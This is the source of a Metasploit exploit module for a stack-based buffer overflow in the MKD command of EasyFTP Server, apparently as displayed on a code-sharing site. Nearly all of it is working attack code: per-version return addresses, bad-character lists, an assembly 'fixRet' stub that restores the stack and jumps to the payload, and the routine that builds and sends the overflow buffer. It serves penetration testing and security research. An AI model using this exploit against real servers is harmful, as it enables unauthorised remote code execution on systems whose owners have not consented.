Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'EasyFTP Server MKD Command Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11

18
          and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which

19
          leads to a stack based buffer overflow.

20


21
          NOTE: EasyFTP allows anonymous access by default. However, in order to access the

22
          'MKD' command, you must have access to an account that can create directories.

23


24
          After version 1.7.0.12, this package was renamed "UplusFtp".

25


26
          This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.

27
          This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by

28
          'fixing' the return address post-exploitation.  See references for more information.

29
        },

30
        'Author' => [

31
          'x90c <geinblues[at]gmail.com>', # original version

32
          'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads)

33
        ],

34
        'License' => MSF_LICENSE,

35
        'References' => [

36
          [ 'OSVDB', '62134' ],

37
          [ 'EDB', '12044' ],

38
          [ 'EDB', '14399' ]

39
        ],

40
        'DefaultOptions' => {

41
          'EXITFUNC' => 'thread'

42
        },

43
        'Privileged' => false,

44
        'Payload' => {

45
          'Space' => 512,

46
          'BadChars' => "\x00\x0a\x0d\x2f\x5c",

47
          'DisableNops' => true

48
        },

49
        'Platform' => 'win',

50
        'Targets' => [

51
          [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe

52
          [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe

53
          [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe

54
          [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

55
          [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

56
          [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

57
          [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe

58
          [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe

59
          [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe

60
          [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe

61
        ],

62
        'DisclosureDate' => '2010-04-04',

63
        'DefaultTarget' => 0,

64
        'Notes' => {

65
          'Reliability' => UNKNOWN_RELIABILITY,

66
          'Stability' => UNKNOWN_STABILITY,

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        }

69
      )

70
    )

71
  end

72


73
  def check

74
    connect

75
    disconnect

76


77
    if (banner =~ /BigFoolCat/)

78
      return Exploit::CheckCode::Detected

79
    end

80


81
    return Exploit::CheckCode::Safe

82
  end

83


84
  def make_nops(num)

85
    "C" * num

86
  end

87


88
  def exploit

89
    connect_login

90


91
    # NOTE:

92
    # This exploit jumps to ebp, which happens to point at a partial version of

93
    # the 'buf' string in memory. The fixRet below fixes up the code stored on the

94
    # stack and then jumps there to execute the payload. The value in esp is used

95
    # with an offset for the fixup.

96
    fixRet_asm = %q{

97
      mov edi,esp

98
      sub edi, 0xfffffe10

99
      mov [edi], 0xfeedfed5

100
      add edi, 0xffffff14

101
      jmp edi

102
    }

103
    fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string

104


105
    buf = ''

106


107
    print_status("Prepending fixRet...")

108
    buf << fixRet

109
    buf << make_nops(0x20 - buf.length)

110


111
    print_status("Adding the payload...")

112
    buf << payload.encoded

113


114
    # Patch the original stack data into the fixer stub

115
    buf[10, 4] = buf[268, 4]

116


117
    print_status("Overwriting part of the payload with target address...")

118
    buf[268, 4] = [target.ret].pack('V') # put return address @ 268 bytes

119


120
    print_status("Sending exploit buffer...")

121
    send_cmd(['MKD', buf], false)

122


123
    handler

124
    disconnect

125
  end

126
end

127


128